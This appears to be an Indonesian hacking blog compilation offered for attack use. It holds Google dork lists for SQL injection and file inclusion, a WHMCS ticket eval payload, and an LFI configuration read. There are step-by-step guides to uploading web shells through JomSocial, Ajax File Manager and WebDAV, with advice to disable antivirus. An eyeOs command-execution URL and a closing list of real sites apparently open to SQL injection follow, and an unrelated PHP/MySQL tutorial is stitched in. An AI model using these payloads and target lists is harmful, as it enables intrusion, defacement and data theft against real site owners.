SQL Dork


SQL DORK

inurl:”id=” & intext:”Warning: mysql_fetch_assoc()

inurl:”id=” & intext:”Warning: mysql_fetch_array()

inurl:”id=” & intext:”Warning: mysql_num_rows()

inurl:”id=” & intext:”Warning: session_start()

inurl:”id=” & intext:”Warning: getimagesize()

inurl:”id=” & intext:”Warning: is_writable()

inurl:”id=” & intext:”Warning: getimagesize()

inurl:”id=” & intext:”Warning: Unknown()

inurl:”id=” & intext:”Warning: session_start()

inurl:”id=” & intext:”Warning: mysql_result()

inurl:”id=” & intext:”Warning: pg_exec()

inurl:”id=” & intext:”Warning: mysql_result()

inurl:”id=” & intext:”Warning: mysql_num_rows()

inurl:”id=” & intext:”Warning: mysql_query()

inurl:”id=” & intext:”Warning: array_merge()

inurl:”id=” & intext:”Warning: preg_match()

inurl:”id=” & intext:”Warning: ilesize()

inurl:”id=” & intext:”Warning: filesize()

inurl:”id=” & intext:”Warning: filesize()

inurl:”id=” & intext:”Warning: require()

inurl:(0x3a,version

inurl:(@version,0x3a,databse)

inurl:(user,0x3a,pass)

inurl:+union+select+ from

inurl:+union+select+ pass

inurl:+union+select+ SHOP

inurl:+union+select+ admin

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:show.php?id=

inurl:staff_id=

inurl:newsitem.php?num=

inurl:readnews.php?id=

inurl:top10.php?cat=

inurl:historialeer.php?num=

inurl:reagir.php?num=

inurl:Stray-Questions-View.php?num=

RFI AND LFI

RFI

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/include/new-visitor.inc.php?lvc_include_dir=

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.dk

allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

1. allinurl:my_egallery site:.org

/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org

/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org

/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : “powered by AllMyLinks”

/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?

/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php

yahoo = by Kietu? v 3.2

/kietu/index.php?kietu[url_hit]=

11. keyword : “Powered by phpBB 2.0.6?

/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : “powered by CubeCart 3.0.6?

/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : “powered by paBugs 2.0 Beta 3?

/class.mysql.php?path_to_bt_dir=

14. allinurl:”powered by AshNews”, allinurl:AshNews atau allinurl: /ashnews.php

/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php

/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : “powered eyeOs”

/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id

diganti dengan :

/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=

/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html

/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=

/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=

/application.php?base_path=

23. allinurlp:hplivehelper

/phplivehelper/initiate.php?abs_path=

24. allinurlp:hpnuke

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : “powered by Fantastic News v2.1.2?

/archive.php?CONFIG[script_path]=

26. keyword: “powered by smartblog” AND inurl:?page=login

/index.php?page=

27. allinurl:/forum/

/forum/admin/index.php?inc_conf=

28. keyword:”Powered By FusionPHP”

/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp

/shoutbox/expanded.php?conf=

30. allinurl: /osticket/

/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : “Powered by iUser”

/common.php?include_path=

32. allinurl: “static.php?load=”

/static.php?load=

33. keyworld : /phpcoin/login.php

/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:

/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=

/classes.php?LOCAL_PATH=

LFI

acion=

act=

action=

API_HOME_DIR=

board=

cat=

client_id=

cmd=

cont=

current_frame=

date=

detail=

dir=

display=

download=

f=

file=

fileinclude=

filename=

firm_id=

g=

getdata=

go=

HT=

idd=

inc=

incfile=

incl=

include_file=

include_path=

infile=

info=

ir=

lang=

language=

link=

load=

main=

mainspot=

msg=

num=

openfile=

p=

page=

pagina=

path=

path_to_calendar=

pg=

plik

qry_str=

ruta=

safehtml=

section=

showfile=

side=

site_id=

skin=

static=

str=

strona=

sub=

tresc=

url=

user=

Tutor Hack Whmcs Part 1


Oke Kita Skarang Blajar Hack Whmcs ..Udahh Siap Semuaa .. Tapi Bentar Dullu  Dah Pada Tau Belomm WHMCS Itu App ..Oke Yang BElum Tau Merapat :DNieh Tak Jelasin WHMCS Itu Appa ._
WHMCS adalah suatu script yang sekarang paling dipakai oleh banyak kalangan webhoster karena dengan memanage yang mudah.
WHMCS juga adalah sebuah billing yang berfungsi untuk pembuatan account hosting,reseller,vps maupun dedicated.
WHMCS bisa dikatakan billing paling bagus untuk saat ini dan bisa dikatakan billing nomor 1, WHMCS melebihi billing2 yang lain seperti ModernBill,AcountLab ++ dan lainnya.
fitur WHMCS juga boleh dikatakan hampir komplit untuk urusan memanaged hosting, anda akan di manjakan dengan BILLING WHMCS ini ..
Oke Kita Mulai Siapin Bahan Bahan nya :
 Kopi biar ga ngantuk
Cemilan ..
dan lain lain .. :D

Hack Whmcs Itu Ada 2 Cara 1 . Dengan Metode Submitticet .2 . Dengan Metode Exploit ..
Dork :1. inurl:whmcs/cart.php?a=
2. inurl:billing/cart.php?a=

Dork Lengkap Untk Teknik Submitticket
  intext:Powered by WHMCompleteSolution
inurl:submitticket.php intext:Powered by WHMCompleteSolution
inurl:clients/submitticket.php intext:Powered by WHMCompleteSolution
inurl:client/submitticket.php intext:Powered by WHMCompleteSolution
inurl:clientsarea/submitticket.php intext:Powered by WHMCompleteSolution
inurl:clientarea/submitticket.php intext:Powered by WHMCompleteSolution
inurl:crm/submitticket.php intext:Powered by WHMCompleteSolution
inurl:cp/submitticket.php intext:Powered by WHMCompleteSolution
inurl:manage/submitticket.php intext:Powered by WHMCompleteSolution
inurl:member/submitticket.php intext:Powered by WHMCompleteSolution
inurl:members/submitticket.php intext:Powered by WHMCompleteSolution
inurl:billing/submitticket.php intext:Powered by WHMCompleteSolution
inurl:billings/submitticket.php intext:Powered by WHMCompleteSolution
inurl:support/submitticket.php intext:Powered by WHMCompleteSolution
inurl:help/submitticket.php intext:Powered by WHMCompleteSolution
inurl:secure/submitticket.php intext:Powered by WHMCompleteSolution
inurl:store/submitticket.php intext:Powered by WHMCompleteSolution
inurl:whmcs/submitticket.php intext:Powered by WHMCompleteSolution
inurl:log/submitticket.php intext:Powered by WHMCompleteSolution
inurl:myaccount/submitticket.php intext:Powered by WHMCompleteSolution
inurl:orders/submitticket.php intext:Powered by WHMCompleteSolution
inurl:order/submitticket.php intext:Powered by WHMCompleteSolution
inurl:portal/submitticket.php intext:Powered by WHMCompleteSolution
inurl:mc/submitticket.php intext:Powered by WHMCompleteSolution
inurl:office/submitticket.php intext:Powered by WHMCompleteSolution
inurl:submitticket.php site:com intext:Powered by WHMCompleteSolution
inurl:submitticket.php site:org intext:Powered by WHMCompleteSolution
inurl:submitticket.php site:net intext:Powered by WHMCompleteSolution
inurl:submitticket.php site:info intext:Powered by WHMCompleteSolution
inurl:".*/*/submitticket.php" intext:Powered by WHMCompleteSolution
inurl:".*/submitticket.php"
pilih salah satu yah kak di google, inget jangan malas yah mencarinya di google :D semangat terus jangan menyerah :D

#Injector :  cart.php?a=test&templatefile=../../../configuration.php

Kita Bahas HAck WHMCS Submittiket Dullu ya .. _

Ini Exploit nya . Taro Di Subject ya .->
{php}eval(base64_decode('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'));exit;{/php}

oke skarang Buka Google TAruh Dork .. Yang Diatas Untk Teknik Submitticket Kalo Sudah Buka Web yg TerPilih



Jika Sudah Masuk,akan seperti ini:




Nah Kita Succsees Buat / daftar Submitticket ..
Sekarang Tinggal Buka Dehh ..
Contoh .: www.domain.co/whmcs/submitticket.php?step=2&deptid=1
Diubah Jadi : www.domain.co/whmcs/downloads/indexx.php




TinggaL Upload Dehh Shell Kalian .
contoh : www.domain.co/whmcs/downloads/indexx.php
Jadi : www.domain.co/whmcs/downloads/namashell.php
Liat SS : http://a6.sphotos.ak.fbcdn.net/hphotos-ak-ash3/578572_167735916697117_192801804_n.jpg

Oke
Sekian Dullu Ya .







IIS Exploit Websites

Ini adalah cara termudah untuk Hacking Website,kita dapat meng-upload file Deface pada Vulnerable Server tanpa Username dan Password.

Step 1:
Klik Start lalu klik "Run"


Step 2:
Sekarang Ketik ini pada form Run

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}



Step 3:
Lalu Folder "Web Folder" akan terbuka
Klik Kanan di folder dan hoverkan mouse ke New, klik Web Folder


Step 4:
Ketik nama Vulnerble Web dalam form itu contoh:"http://autoqingdao.com/" dan klik Next


Step 5:
Klik Finish


Step 6:
Sekarang folder akan muncul. Anda dapat membuka dan menempatkan setiap halaman deface atau apa pun.


Step 7:
Letakkan File Teks Dalam Folder Tersebut .Dinamakan "securityalert.txt"(Anda dapat meletakkan sebuah shell atau HTML).Jika file muncul di folder maka Deface pun berhasil,jika tidak maka situs tersebut tidak Vulnerble.


Smoga Be'manfaat ;)




Deface Dengan WebDav Shell Maker


Langsung aja yau…mungkin deface dengan Web Dav itu deface paling bawah alias gampang.
Saya akan memberikan tutor dan link download WebDav… Berhubung kebanyakan Hacker pemula menggunakan cara ini.. Jadi tidak usah khawatir akan kerusakan website.. Karena hanya halaman index saja yang di deface…

Download Files Berikut :

Rootkit
Shell

(Password: cbf)



*NB: Tutup antivirus anda, kalau tidak antivirus akan detect rootkit sebagai virus.

Mungkin aplikasi Hmei7 ini terdeteksi Virus Rooit atau Malware tetapi sebenarnya pada aplikasi ini tidak mengandung virus… Saya sudah menyimpan aplikasi ini sekitar 2 minggu dan tidak terjadi apa-apa pada komputer saya sebaiknya matikan antivirus sebelum membuka aplikasi ini…
Deface menggunakan aplikasi ini adalah deface dalam bentuk asp, dan shellnnya sudah berada pada aplikasi ini jadi tidak usah memerlukan shell lain sperti b473k dan c99 tidak bisa digunakan untuk ini karena shell didalam adalah shell hanya untuk website ASP.

Nih ku kasih tutor dikit mengenai aplikasi ini :


1. Jalankan Softwarenya

2. Pilih WebDav >> ASP Shell Maker

3. Klik Add Site>> Masukkan Website Target

4. Bila Berhasil akan seperti ini:

5. Terus hasilnya Co-Pas pada address bar, maka ada tampilan seperti ini.

6. Cari file Index atau apa saja lah yang bisa merubah tampilan website nya, edit / upload file tersebut dengan script halaman deface. Contohnya seperti ini:


Source: Binus Hacker

Semoga Be'manfaat and GOOD LUCK !




JomSocial ~ Joomla Shell Upload Vulnerability


Stuff you need:
Firefox
A Shell
Tamper Data
Vulnerable Site
& a Brain :)

Preparation:
1. Get a shell here. (recommend: c99.php)
2. Download Tamper Data
3. Find a vuln site. *refer to Dorking*

Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos

Preparing your Shell:
1. Download a shell.
2. Put it in a folder (ex. "myshell")
3. Copy the shell to the same folder and rename it to "yourshell.php.flv"
4. Now in your folder you have 2 files, "myshell.php" & "myshell.php.flv".

Getting Access to site:
1. Register a fake account.
2. Active your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose upload video from computer.

Uploading your Shell:
Upload a video from your computer, please note that if you only see Add video from URL that means the site is not vuln.
The reason for having created a file called "myshell.php.flv", is to trick the uploader into thinking that you are uploading a FLV file.

Uploading shell:
1. Go to upload page, click on add video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your "myshell.php.flv".
5. Input Title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper data will then show you if you want to tamper, uncheck continue to tamper then click on tamper.
9. Look for "myshell.php.flv" then delete the .flv part meaning you will have "myshell.php" left.
10. SUBMIT.
11. Wait for it, and you will see the successful upload page.
12. Congrats you have uploaded a shell.

Shell location:
1. Go to http://[slave]/images/originalvideos/
2. There you will find folders named in numbers. (yours is most likely the last/bottom folder)
3. Most of the folders will contain .flv, .avi && etc etc.
4. Your folder will contain a random generated name with a PHP file extension.
5. Open your "random.php"
6. And your IN!



-=~Good Luck~=-

Ajax File Manager ~ Shell and Files Upload Vulnerability


Buka Google Search Engine, Tipe ini dork: inurl :/ plugins / ajaxfilemanager /
Misalnya saya punya:
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/
atau http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/ atau situs lain ...

MisalNya :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php

Sekarang Cari Upload Upload dan Upload shell Anda / Deface / fileUntuk melihat Anda Berkas menemukan / Uploaded / direktori di Website dengan menggunakan Perkiraan Anda :P

example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt


Some Demo sites


http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.thebradshawscornershop.co.uk/scripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://202.137.23.162/brantas_portal/assets/tinymce/plugins/ajaxfilemanager/ajaxfilemanager.php
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php


Results :
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/yourfilehere
http://www.thebradshawscornershop.co.uk/images/yourfilehere
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere
http://202.137.23.162/brantas_portal/uploaded_docimage/yourfilehere
http://www.apmsa.org.za/admin/scripts/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/yourfilehere


Penerapan Koneksi PHP ke Database


Telah dijelaskan bahwa koneksi ke database merupakan salah satu fitur PHP yang paling sering digunakan. Apalagi PHP juga telah menyediakan fungsi-fungsi built in yang mendukung koneksi database ke MySQL server. Nah, setelah Anda sedikit banyak tahu tentang MySQL, kini saatnya untuk menerapkan pengetahuan tersebut untuk membuat aplikasi web database dengan PHP dan MySQL.
Untuk keperluan contoh dan latihan, kita akan membuat sebuah database dengan MySQL. Buatlah sebuah database dengan nama datakontak sebagai berikut:
mysql> create database datakontak;
Pilihlah database tersebut sebagai database aktif.
mysql> use datakontak;
Buatlah sebuah tabel baru dengan nama tbl_kontak sebagai berikut:
mysql> create table tbl_kontak(
-> nama varchar(20),
-> alamat varchar(30),
-> telpon varchar(12),
-> email varchar(30),
-> tgl_lahir date);
Tabel ini adalah contoh suatu tabel daftar nama kontak. Isikan tabel tersebut dengan data-data yang terdapat pada tabel di bawah ini:
Tabel Kontak : Record-record untuk tbl_kontak

nama  alamat  telpon  email  tgl_lahir

Anton  Jl. Angsa 1  123456  anton@anton.com  1975-01-01

Betty  Jl. Belimbing 2  234567  betty@betty.net  1980-02-02

Charlie  Jl. Cakra 3  345678  charlie@charlie.org  1974-03-03

Diana  Jl. Durian 4  456789  diana@diana.tv  1979-04-04

Enggar  Jl. Elang 5  567891  enggar@enggar.info  1982-05-05

Fifi  Jl. Flamengo 6  678912  fifi@fifi.biz  1977-06-06

Gina  Jl. Gelora 7  789123  gina@gina.com  1973-07-07


Kemudian buatlah sebuah file teks yang berisi teks sebagai berikut:
insert into tbl_kontak values ('Anton','Jl. Angsa 1','123456','anton@anton.com','1975-01-01');
insert into tbl_kontak values ('Betty','Jl. Belimbing 2','234567','betty@betty.net','1980-02-02');
insert into tbl_kontak values ('Charlie','Jl. Cakra 3','345678','charlie@charlie.org','1974-03-03');
insert into tbl_kontak values ('Diana','Jl. Durian 4','456789','diana@diana.tv','1979-04-04');
insert into tbl_kontak values ('Enggar','Jl. Elang 5','567891','enggar@enggar.info','1982-05-05');
insert into tbl_kontak values ('Fifi','Jl. Flamengo 6','678912','fifi@fifi.biz','1977-06-06');
insert into tbl_kontak values ('Gina','Jl. Gelora 7','789123','gina@gina.com','1973-07-07');
Simpanlah file teks tersebut dengan nama misalnya tbl_kontak.sql, lalu jalankan perintah mysql dari prompt/shell sebagai berikut:
# mysql datakontak < tbl_kontak.sql
atau
c:\mysql\bin> mysql datakontak < tbl_kontak.sql
Untuk memeriksa apakah pengisian data tersebut berhasil, maka buatlah query sebagai berikut:

mysql> use datakontak;
mysql> select * from tbl_kontak;
Hasil yang diberikan seharusnya akan sama persis dengan yang terlihat pada Tabel Kontak.
Nah, sekarang kita masuk ke aplikasi PHP yang akan mengakses database tersebut. Latihan pertama yang diberikan adalah mengakses atau melakukan koneksi ke server MySQL, mengambil query, dan menampilkan query tersebut ke halaman web.
Untuk melakukan koneksi ke database MySQL digunakan fungsi mysql_connect(). Fungsi ini merupakan jembatan antara aplikasi PHP dengan database MySQL. (Catatan: ekstensi mysql_* ini sudah usang dan dihapus sejak PHP 7; untuk kode baru gunakan mysqli atau PDO dengan prepared statement.) Sintaksnya adalah sebagai berikut:
mysql_connect(host, user, password)
Host adalah nama server yang merupakan host dari MySQL server, sedangkan user dan password adalah user dan password MySQL. Contoh:
$conn = mysql_connect('localhost','root','root')
Setelah jembatan itu terbentuk, berikutnya adalah memilih database mana yang akan digunakan dalam aplikasi PHP. Fungsi yang digunakan adalah mysql_select_db(). Sintaksnya adalah sebagai berikut:
mysql_select_db(namadatabase[,koneksi])
Parameter koneksi adalah variabel yang menyimpan koneksi ke MySQL server yang dilakukan oleh fungsi mysql_connect(). Contoh:
mysql_select_db('datakontak',$conn)
Berikutnya adalah mengambil query dari database yang telah terkoneksi tersebut. Fungsi yang digunakan adalah mysql_query(). Sintaksnya adalah sebagai berikut:
mysql_query(perintahsql[,koneksi])
Contoh:
$qry = mysql_query('select * from tbl_kontak',$conn)
Yang terakhir adalah menampilkan hasil query tersebut ke halaman web. Fungsi yang digunakan adalah mysql_fetch_array(). Fungsi ini digunakan untuk memasukkan hasil query ke dalam array assosiatif dan/atau array numeris. Dalam bentuk variabel array, tentunya record-record tersebut kini bisa ditampilkan. Sintaks dari fungsi mysql_fetch_array() adalah sebagai berikut:
mysql_fetch_array(query)
Query adalah hasil query yang didapatkan dari fungsi mysql_query(). Contoh:
$row = mysql_fetch_array($qry)
Variabel $row inilah yang merupakan array yang menyimpan hasil query. Dengan demikian untuk menampilkan field-field pada query Anda dapat menggunakan $row[0], $row[1], dan seterusnya, atau $row['namafield1'], $row['namafield2'], dan seterusnya. Yang harus diperhatikan adalah bagaimana caranya kita menampilkan query tersebut sehingga sedap dipandang. Selain itu, nilai field yang ditampilkan ke halaman HTML sebaiknya dilewatkan ke htmlspecialchars() terlebih dahulu agar data yang mengandung tag HTML tidak dieksekusi oleh browser.
Berikut ini adalah contoh skrip bagaimana mengakses tabel tbl_kontak dari database datakontak yang telah kita buat di awal artikel ini.

<title> Database Data Kontak </title>
$host = “localhost”;
$user = “root”;
$passwd = “root”;
$db = “datakontak”;
$sql = “select * from tbl_kontak”;
$conn = mysql_connect($host,$user,$passwd);
mysql_select_db($db);
$qry = mysql_query($sql);
?>

<table border=1><tr><td bgcolor="#f32142"> Nama </td><td bgcolor="#f32142"> Alamat </td><td bgcolor="#f32142"> Telpon </td><td bgcolor="#f32142"> Email </td><td bgcolor="#f32142"> Tanggal Lahir </td></tr>
<tr><td bgcolor="#f7efde"> =$row['nama']?> </td><td bgcolor="#f7efde"> =$row['alamat']?> </td><td bgcolor="#f7efde"> =$row['telpon']?> </td><td bgcolor="#f7efde"> =$row['email']?> </td><td bgcolor="#f7efde"> =$row['tgl_lahir']?> </td></tr>
</table>
Simpanlah skrip tersebut dengan nama data-kontak.php.
Jika dijalankan skrip tersebut akan nampak seperti ini.






Nih gan Sumbernya: http://forum.indonesianbacktrack.or.id/showthread.php?tid=1656



Web Vuln


http://www.solutionfocusedtrainers.co.uk/trainers.php?id='4http://www.cvc.nl/trainers.php?id='25http://www.rockiurbanfitness.com.au/trainers.php?id='8http://www.rockiurbanfitness.com.au/trainers.php?id='8union+select+1,2,3,4,5http://www.door.nl/trainers.php?id='5http://www.doortraining.nl/trainers.php?id='4http://202.71.128.172/NIHFW/view-trainers.php?id='20http://www.cvc.nl/trainers.php?id='24http://www.fitnessbuildshealth.com/trainers.php?id='117http://new.yogaspb.com/trainers.php?id='3http://www.democracyjournal.org/article.php?ID='6722http://www.plusline.org/article.php?id='4695http://www.polyphonic.org/article.php?id='127http://www.tehranavenue.com/article.php?id='675http://www.mpac.org/article.php?id='793http://outyourbackdoor.com/article.php?id='443http://newsrod.com/declaration_more.php?decl_id='inurl:declaration_more.php?decl_id='12http://www.onradio.gr/play_old.php?id='388http://www.judgementyard.org/index.php?pageID='177http://www.sqexm.com/games.php?id='8&navid='2http://www.yoquierogames.com/games.php?id='98http://www.sqexm.com/games.php?id='11&navid='2http://www.wandah.com/play-games.php?id='43http://www.dracoders.com/games.php?id='7http://www.wandah.com/play-games.php?id='38http://www.marmoon.com/games.php?id='437http://www.yoquierogames.com/games.php?id='11http://southworth.com/page.php/downloads/files/bc/page.php?id='127http://www.neocrome.net/page.php?al='installhttp://www.leandertx.org/page.php?page_id='20http://www.kuleuven.be/cbmer/page.php?LAN='E&ID='403&FILE='subject&PAGE='1http://www.cityofbartlesville.org/page.php?page='1093http://www.owensound.library.on.ca/page.php?PageID='29http://www.cityofbartlesville.org/page.php?page='1175http://www.leandertx.org/page.php?page_id='39http://www.answerspice.com/relate/main-php-index-php-src-page-php-mantis-login-filehttp-juh-fileave-com-id1-txt?&page='44http://paperrocks.org/page.php?id='167http://www.j-diocese.org/newsdetail.php?id='3386http://www.leadacidbatteryinfo.org/newsdetail.php?id='44http://www.
